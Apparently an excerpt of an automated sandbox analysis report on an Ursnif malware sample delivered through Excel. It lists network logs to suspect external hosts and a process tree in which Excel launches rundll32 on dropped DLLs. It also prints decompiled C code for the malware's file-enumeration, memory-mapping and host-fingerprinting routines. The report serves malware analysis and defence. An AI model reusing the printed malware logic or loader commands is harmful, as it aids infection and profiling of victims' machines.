Apr 4, 2021 02:30:39.341922045 CEST	8.8.8.8	192.168.2.22	0xcc51	No error (0)	login.microsoftonline.com	a.privatelink.msidentity.com		CNAME (Canonical name)	IN (0x0001)
Apr 4, 2021 02:30:39.341922045 CEST	8.8.8.8	192.168.2.22	0xcc51	No error (0)	a.privatelink.msidentity.com	prda.aadg.msidentity.com		CNAME (Canonical name)	IN (0x0001)
Apr 4, 2021 02:30:39.341922045 CEST	8.8.8.8	192.168.2.22	0xcc51	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 4, 2021 02:30:39.546601057 CEST	8.8.8.8	192.168.2.22	0x54b7	No error (0)	prda.aadg.msidentity.com	www.tm.a.prd.aadg.akadns.net		CNAME (Canonical name)	IN (0x0001)
Apr 4, 2021 02:31:21.153742075 CEST	8.8.8.8	192.168.2.22	0xe4dd	No error (0)	under17.com		185.243.114.196	A (IP address)	IN (0x0001)

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 4, 2021 02:28:50.248172998 CEST	207.174.213.126	443	192.168.2.22	49167	CN=vts.us.com CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Wed Aug 26 02:00:00 CEST 2020 Fri Nov 02 01:00:00 CET 2018 Tue Mar 12 01:00:00 CET 2019	Fri Aug 27 01:59:59 CEST 2021 Wed Jan 01 00:59:59 CET 2031 Mon Jan 01 00:59:59 CET 2029	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN=Sectigo RSA Domain Validation Secure Server CA, O=Sectigo Limited, L=Salford, ST=Greater Manchester, C=GB	CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	Fri Nov 02 01:00:00 CET 2018	Wed Jan 01 00:59:59 CET 2031
					CN=USERTrust RSA Certification Authority, O=The USERTRUST Network, L=Jersey City, ST=New Jersey, C=US	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Tue Mar 12 01:00:00 CET 2019	Mon Jan 01 00:59:59 CET 2029
Apr 4, 2021 02:28:52.604314089 CEST	162.241.62.4	443	192.168.2.22	49170	CN=mail.mundotecnologiasolar.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Mar 17 19:57:39 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue Jun 15 20:57:39 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:52.604314089 CEST	162.241.62.4	443	192.168.2.22	49170	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:54.121596098 CEST	192.185.129.4	443	192.168.2.22	49172	CN=webmail.accesslinksgroup.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Fri Feb 12 14:32:48 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Thu May 13 15:32:48 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:54.121596098 CEST	192.185.129.4	443	192.168.2.22	49172	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:55.138710976 CEST	5.100.155.169	443	192.168.2.22	49173	CN=mail.ponchokhana.com CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Mar 03 22:31:59 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Tue Jun 01 23:31:59 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:55.138710976 CEST	5.100.155.169	443	192.168.2.22	49173	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 4, 2021 02:28:56.116693974 CEST	198.50.218.68	443	192.168.2.22	49174	CN=comosairdoburaco.com.br CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Sun Mar 14 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004	Sun Jun 13 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
					CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025
					CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB	Thu Jan 01 01:00:00 CET 2004	Mon Jan 01 00:59:59 CET 2029

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2004 Parent PID: 584

General

Start time:	02:28:34
Start date:	04/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13f770000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2292 Parent PID: 2004

General

Start time:	02:28:43
Start date:	04/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\fikftkm.thj,DllRegisterServer
Imagebase:	0xffb30000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2396 Parent PID: 2004

General

Start time:	02:28:44
Start date:	04/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\fikftkm.thj1,DllRegisterServer
Imagebase:	0xffb30000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2748 Parent PID: 2004

General

Start time:	02:28:44
Start date:	04/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\fikftkm.thj2,DllRegisterServer
Imagebase:	0xffb30000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2764 Parent PID: 2748

General

Start time:	02:28:44
Start date:	04/04/2021
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32 ..\fikftkm.thj2,DllRegisterServer
Imagebase:	0x6f0000
File size:	44544 bytes
MD5 hash:	51138BEEA3E2C21EC44D0932C71762A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.2495224017.00000000030CD000.00000004.00000040.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000002.2504044164.0000000000170000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000006.00000003.2357108464.00000000031CB000.00000004.00000040.sdmp, Author: Joe Security
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2852 Parent PID: 2004

General

Start time:	02:29:15
Start date:	04/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\fikftkm.thj3,DllRegisterServer
Imagebase:	0xffb30000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: rundll32.exe PID: 2968 Parent PID: 2004

General

Start time:	02:29:15
Start date:	04/04/2021
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	rundll32 ..\fikftkm.thj4,DllRegisterServer
Imagebase:	0xffb30000
File size:	45568 bytes
MD5 hash:	DD81D91FF3B0763C392422865C9AC12E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: iexplore.exe PID: 2824 Parent PID: 584

General

Start time:	02:30:21
Start date:	04/04/2021
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x13f190000
File size:	814288 bytes
MD5 hash:	4EB098135821348270F27157F7A84E65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 2528 Parent PID: 2824

General

Start time:	02:30:22
Start date:	04/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:2824 CREDAT:275457 /prefetch:2
Imagebase:	0xf70000
File size:	815304 bytes
MD5 hash:	8A590F790A98F3D77399BE457E01386A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 3004 Parent PID: 584

General

Start time:	02:31:07
Start date:	04/04/2021
Path:	C:\Program Files\Internet Explorer\iexplore.exe
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Imagebase:	0x13fb50000
File size:	814288 bytes
MD5 hash:	4EB098135821348270F27157F7A84E65
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: iexplore.exe PID: 3064 Parent PID: 3004

General

Start time:	02:31:07
Start date:	04/04/2021
Path:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:3004 CREDAT:275457 /prefetch:2
Imagebase:	0x50000
File size:	815304 bytes
MD5 hash:	8A590F790A98F3D77399BE457E01386A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: rundll32.exe PID: 2764 Parent PID: 2748 rundll32.exeCOMMON

Executed Functions

Function 001C12D4, Relevance: 34.7, APIs: 23, Instructions: 222
memoryfiletimeCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E001C12D4(signed char* __eax, intOrPtr* _a4) {
				signed int _v12;
				void* _v16;
				CHAR* _v20;
				struct _FILETIME _v28;
				void* _v32;
				void* _v36;
				char* _v40;
				signed int _v44;
				long _v344;
				struct _WIN32_FIND_DATAA _v368;
				signed int _t72;
				void* _t74;
				signed int _t76;
				void* _t78;
				intOrPtr _t81;
				CHAR* _t83;
				void* _t85;
				signed char _t89;
				signed char _t91;
				intOrPtr _t93;
				void* _t96;
				long _t99;
				int _t101;
				signed int _t109;
				char* _t111;
				void* _t113;
				int _t119;
				char _t128;
				void* _t134;
				signed int _t136;
				char* _t139;
				signed int _t140;
				char* _t141;
				char* _t146;
				signed char* _t148;
				int _t151;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t165;

				_v12 = _v12 & 0x00000000;
				_t148 = __eax;
				_t72 =  *0x1cd278; // 0x63699bc3
				_t74 = RtlAllocateHeap( *0x1cd238, 0, _t72 ^ 0x63699ac7);
				_v20 = _t74;
				if(_t74 == 0) {
					L36:
					return _v12;
				}
				_t76 =  *0x1cd278; // 0x63699bc3
				_t78 = RtlAllocateHeap( *0x1cd238, 0, _t76 ^ 0x63699bce);
				_t146 = 0;
				_v36 = _t78;
				if(_t78 == 0) {
					L35:
					HeapFree( *0x1cd238, _t146, _v20);
					goto L36;
				}
				_t136 =  *0x1cd278; // 0x63699bc3
				memset(_t78, 0, _t136 ^ 0x63699bce);
				_t81 =  *0x1cd27c; // 0x317a7d0
				_t154 = _t153 + 0xc;
				_t5 = _t81 + 0x1ce7f2; // 0x73797325
				_t83 = E001C95B1(_t5);
				_v20 = _t83;
				if(_t83 == 0) {
					L34:
					HeapFree( *0x1cd238, _t146, _v36);
					goto L35;
				}
				_t134 = 0xffffffffffffffff;
				_v28.dwLowDateTime = 0x63699bce;
				_v28.dwHighDateTime = 0x63699bce;
				_t85 = CreateFileA(_t83, 0x80000000, 1, 0, 3, 0x80, 0); // executed
				_v32 = _t85;
				if(_t85 != 0x63699bce) {
					GetFileTime(_t85,  &_v28, 0, 0);
					_v28.dwLowDateTime = _v28.dwLowDateTime + 0x2a69c000;
					asm("adc dword [ebp-0x14], 0xc9");
					CloseHandle(_v32);
				}
				 *(StrRChrA(_v20, _t146, 0x5c)) = 0;
				_t89 = 0x3c6ef35f +  *_t148 * 0x19660d;
				_t91 = 0x3c6ef35f + _t89 * 0x19660d;
				 *_t148 = _t91;
				_v32 = _t91 & 0x000000ff;
				_t93 =  *0x1cd27c; // 0x317a7d0
				_t16 = _t93 + 0x1ce813; // 0x642e2a5c
				_v40 = _t146;
				_v44 = _t89 & 0x000000ff;
				__imp__(_v20, _t16);
				_t96 = FindFirstFileA(_v20,  &_v368); // executed
				_v16 = _t96;
				if(_t96 == _t134) {
					_t146 = 0;
					goto L34;
				}
				_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				while(_t99 > 0) {
					_t101 = FindNextFileA(_v16,  &_v368); // executed
					if(_t101 == 0) {
						FindClose(_v16);
						_v16 = FindFirstFileA(_v20,  &_v368);
						_v28.dwHighDateTime = _v344;
						_v28.dwLowDateTime = _v368.ftLastWriteTime.dwLowDateTime;
					}
					_t99 = CompareFileTime( &(_v368.ftLastWriteTime),  &_v28);
				}
				_v12 = _v12 & 0x00000000;
				while(1) {
					_t109 = _v44;
					if(_v12 <= _t109) {
						goto L15;
					}
					_t140 = _v12;
					if(_t140 > _v32) {
						_t141 = _v36;
						 *_a4 = _t141;
						while(1) {
							_t128 =  *_t141;
							if(_t128 == 0) {
								break;
							}
							if(_t128 < 0x30) {
								 *_t141 = _t128 + 0x20;
							}
							_t141 = _t141 + 1;
						}
						_v12 = 1;
						FindClose(_v16); // executed
						_t146 = 0;
						goto L35;
					}
					_t165 = _t140 - _t109;
					L15:
					if(_t165 == 0 || _v12 == _v32) {
						_t111 = StrChrA( &(_v368.cFileName), 0x2e);
						_t139 = _v40;
						_t151 = _t111 -  &(_v368.cFileName);
						_t113 = 0;
						if(_t139 != 0) {
							_t48 = _t151 - 4; // -4
							_t113 = _t48;
							if(_t113 > _t151) {
								_t113 = 0;
							}
						}
						if(_t151 > 4) {
							_t151 = 4;
						}
						memcpy(_v36 + _t139, _t152 + _t113 - 0x140, _t151);
						_t154 = _t154 + 0xc;
						_v40 =  &(_v40[_t151]);
					}
					do {
						_t119 = FindNextFileA(_v16,  &_v368); // executed
						if(_t119 == 0) {
							FindClose(_v16);
							_v16 = FindFirstFileA(_v20,  &_v368);
						}
					} while (CompareFileTime( &(_v368.ftLastWriteTime),  &_v28) > 0);
					_v12 = _v12 + 1;
				}
			}

0x001c12dd
0x001c12e3
0x001c12e5
0x001c12ff
0x001c1303
0x001c1306
0x001c157b
0x001c1582
0x001c1582
0x001c130c
0x001c1321
0x001c1323
0x001c1327
0x001c132a
0x001c156b
0x001c1575
0x00000000
0x001c1575
0x001c1330
0x001c133b
0x001c1340
0x001c1345
0x001c1348
0x001c134f
0x001c1356
0x001c1359
0x001c155b
0x001c1565
0x00000000
0x001c1565
0x001c136f
0x001c1373
0x001c1376
0x001c1379
0x001c1381
0x001c1384
0x001c138d
0x001c1393
0x001c139d
0x001c13a4
0x001c13a4
0x001c13b6
0x001c13c1
0x001c13cf
0x001c13d4
0x001c13d9
0x001c13dc
0x001c13e1
0x001c13eb
0x001c13ee
0x001c13f1
0x001c1407
0x001c140b
0x001c140e
0x001c1559
0x00000000
0x001c1559
0x001c1425
0x001c1476
0x001c1439
0x001c1441
0x001c1446
0x001c1454
0x001c145d
0x001c1466
0x001c1466
0x001c1474
0x001c1474
0x001c147a
0x001c147e
0x001c147e
0x001c1484
0x00000000
0x00000000
0x001c1486
0x001c148c
0x001c1533
0x001c1536
0x001c1543
0x001c1543
0x001c1547
0x00000000
0x00000000
0x001c153c
0x001c1540
0x001c1540
0x001c1542
0x001c1542
0x001c154c
0x001c1553
0x001c1555
0x00000000
0x001c1555
0x001c1492
0x001c1494
0x001c1494
0x001c14a7
0x001c14ad
0x001c14b8
0x001c14ba
0x001c14be
0x001c14c0
0x001c14c0
0x001c14c5
0x001c14c7
0x001c14c7
0x001c14c5
0x001c14cc
0x001c14d0
0x001c14d0
0x001c14e0
0x001c14e5
0x001c14e8
0x001c14e8
0x001c14eb
0x001c14f5
0x001c14fd
0x001c1502
0x001c1510
0x001c1510
0x001c1524
0x001c1528
0x001c1528

APIs

RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 001C12FF
RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 001C1321
memset.NTDLL ref: 001C133B

Part of subcall function 001C95B1: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,001C23E9,63699BCE,001C1354,73797325), ref: 001C95C2
Part of subcall function 001C95B1: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 001C95DC

CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C1379
GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 001C138D
CloseHandle.KERNEL32(00000000), ref: 001C13A4
StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 001C13B0
lstrcat.KERNEL32(?,642E2A5C), ref: 001C13F1
FindFirstFileA.KERNELBASE(?,?), ref: 001C1407
CompareFileTime.KERNEL32(?,?), ref: 001C1425
FindNextFileA.KERNELBASE(001C96C1,?), ref: 001C1439
FindClose.KERNEL32(001C96C1), ref: 001C1446
FindFirstFileA.KERNEL32(?,?), ref: 001C1452
CompareFileTime.KERNEL32(?,?), ref: 001C1474
StrChrA.SHLWAPI(?,0000002E), ref: 001C14A7
memcpy.NTDLL(00000000,?,00000000), ref: 001C14E0
FindNextFileA.KERNELBASE(001C96C1,?), ref: 001C14F5
FindClose.KERNEL32(001C96C1), ref: 001C1502
FindFirstFileA.KERNEL32(?,?), ref: 001C150E
CompareFileTime.KERNEL32(?,?), ref: 001C151E
FindClose.KERNELBASE(001C96C1), ref: 001C1553
HeapFree.KERNEL32(00000000,00000000,73797325), ref: 001C1565
HeapFree.KERNEL32(00000000,?), ref: 001C1575

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000006.00000002.2504076161.00000000001C0000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504095624.00000000001CC000.00000002.00000001.sdmp Download File
Associated: 00000006.00000002.2504101151.00000000001CD000.00000004.00000001.sdmp Download File
Associated: 00000006.00000002.2504109228.00000000001CF000.00000002.00000001.sdmp Download File

Similarity

API ID: File$Find$CloseHeapTime$CompareFirst$AllocateEnvironmentExpandFreeNextStrings$CreateHandlelstrcatmemcpymemset
String ID:
API String ID: 455834338-0
Opcode ID: 0f4a0c4452221b89316ed2633a32430e87fb134a7090a0ce12071439f8793288
Instruction ID: c9fdfc30310eb5c316d159159bafdd7d8bddb2db86f5a78f1b7a7a6d9ba9b23c
Opcode Fuzzy Hash: 0f4a0c4452221b89316ed2633a32430e87fb134a7090a0ce12071439f8793288
Instruction Fuzzy Hash: D38125B1D00209EFDB21DFA5DC84EEEBBB9FB59300F11456AE505E6261D730DA85CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 1000102F, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 69%

			E1000102F(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t19;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L10002100();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x10004150;
				_push(_t15 + 0x1000505e);
				_push(_t15 + 0x10005054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L100020FA();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t19 = CreateFileMappingW(0xffffffff, 0x10004140, 4, 0, _t18,  &_v60); // executed
				_t34 = _t19;
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0); // executed
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

0x1000102f
0x10001038
0x1000103c
0x10001042
0x10001047
0x1000104c
0x1000104f
0x10001052
0x10001057
0x10001058
0x1000105b
0x10001066
0x1000106d
0x10001071
0x10001073
0x10001074
0x10001077
0x1000107c
0x10001086
0x10001088
0x10001088
0x1000109c
0x100010a2
0x100010a6
0x100010f6
0x100010a8
0x100010b1
0x100010c7
0x100010cf
0x100010e1
0x100010e5
0x00000000
0x00000000
0x100010d1
0x100010d4
0x100010d9
0x100010db
0x100010db
0x100010bc
0x100010be
0x100010e7
0x100010e8
0x100010e8
0x100010b1
0x100010fe

APIs

GetSystemTimeAsFileTime.KERNEL32(?), ref: 1000103C
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 10001052
_snwprintf.NTDLL ref: 10001077
CreateFileMappingW.KERNELBASE(000000FF,10004140,00000004,00000000,?,?), ref: 1000109C
GetLastError.KERNEL32 ref: 100010B3
MapViewOfFile.KERNELBASE ref: 100010C7
GetLastError.KERNEL32 ref: 100010DF
CloseHandle.KERNEL32(00000000), ref: 100010E8
GetLastError.KERNEL32 ref: 100010F0

Memory Dump Source

Source File: 00000006.00000002.2505264344.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.2505258135.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.2505270801.0000000010005000.00000040.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
Instruction ID: fd2cfec1e864bf63db9aaa2ee4e5368c07c46789b5c4626883214d07a46f71c5
Opcode Fuzzy Hash: 659c6e22773efc5d4acf18c79085ac1006ba0f018220d8c2180b8ead122f5ef9
Instruction Fuzzy Hash: 6821CFB2500258BFE721EFA8CCC4EDE77ADEB483D0F118136F615D7159DAB099858BA0

Uniqueness

Uniqueness Score: -1.00%

Function 001C269C, Relevance: 12.1, APIs: 8, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E001C269C(char __eax, signed int* __esi) {
				long _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v28;
				long _t34;
				signed int _t39;
				int _t43;
				long _t50;
				char _t59;
				intOrPtr _t61;
				void* _t62;
				void* _t63;
				signed int* _t64;
				char _t65;
				intOrPtr* _t67;
				void* _t68;
				signed int* _t69;

				_t69 = __esi;
				_t65 = __eax;
				_v8 = 0;
				_v12 = __eax;
				if(__eax == 0) {
					_t59 =  *0x1cd270; // 0x82c6b188
					_v12 = _t59;
				}
				_t64 = _t69;
				E001C6B43( &_v12, _t64);
				if(_t65 != 0) {
					 *_t69 =  *_t69 ^  *0x1cd278 ^ 0x4c0ca0ae;
				} else {
					GetUserNameW(0,  &_v8); // executed
					_t50 = _v8;
					if(_t50 != 0) {
						_t62 = RtlAllocateHeap( *0x1cd238, 0, _t50 + _t50);
						if(_t62 != 0) {
							if(GetUserNameW(_t62,  &_v8) != 0) {
								_t63 = _t62;
								 *_t69 =  *_t69 ^ E001C2496(_v8 + _v8, _t63);
							}
							HeapFree( *0x1cd238, 0, _t62);
						}
					}
				}
				_t61 = __imp__;
				_v8 = _v8 & 0x00000000;
				GetComputerNameW(0,  &_v8); // executed
				_t34 = _v8;
				if(_t34 != 0) {
					_t68 = RtlAllocateHeap( *0x1cd238, 0, _t34 + _t34);
					if(_t68 != 0) {
						_t43 = GetComputerNameW(_t68,  &_v8); // executed
						if(_t43 != 0) {
							_t63 = _t68;
							_t69[3] = _t69[3] ^ E001C2496(_v8 + _v8, _t63);
						}
						HeapFree( *0x1cd238, 0, _t68);
					}
				}
				asm("cpuid");
				_t67 =  &_v28;
				 *_t67 = 1;
				 *((intOrPtr*)(_t67 + 4)) = _t61;
				 *(_t67 + 8) = _t63;
				 *(_t67 + 0xc) = _t64;
				_t39 = _v16 ^ _v20 ^ _v28;
				_t69[1] = _t69[1] ^ _t39;
				return _t39;
			}

0x001c269c
0x001c26a4
0x001c26aa
0x001c26ad
0x001c26b0
0x001c26b2
0x001c26b7
0x001c26b7
0x001c26bd
0x001c26bf
0x001c26cc
0x001c272d
0x001c26ce
0x001c26d3
0x001c26d9
0x001c26de
0x001c26ec
0x001c26f0
0x001c26ff
0x001c2706
0x001c270d
0x001c270d
0x001c2718
0x001c2718
0x001c26f0
0x001c26de
0x001c272f
0x001c2735
0x001c273f
0x001c2741
0x001c2746
0x001c2755
0x001c2759
0x001c2760
0x001c2764
0x001c276b
0x001c2772
0x001c2772
0x001c277e
0x001c277e
0x001c2759
0x001c2787
0x001c2789
0x001c278c
0x001c278e
0x001c2791
0x001c2794
0x001c279e
0x001c27a2
0x001c27a6

APIs

GetUserNameW.ADVAPI32(00000000,?), ref: 001C26D3
RtlAllocateHeap.NTDLL(00000000,?), ref: 001C26EA
GetUserNameW.ADVAPI32(00000000,?), ref: 001C26F7
HeapFree.KERNEL32(00000000,00000000), ref: 001C2718
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001C273F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C2753
GetComputerNameW.KERNEL32(00000000,00000000), ref: 001C2760
HeapFree.KERNEL32(00000000,00000000), ref: 001C277E

Memory Dump Source

Source File: 00000006.00000002.2504084087.00000000001C1000.00000020.00000001.sdmp, Offset: 001C0000, based on PE: true

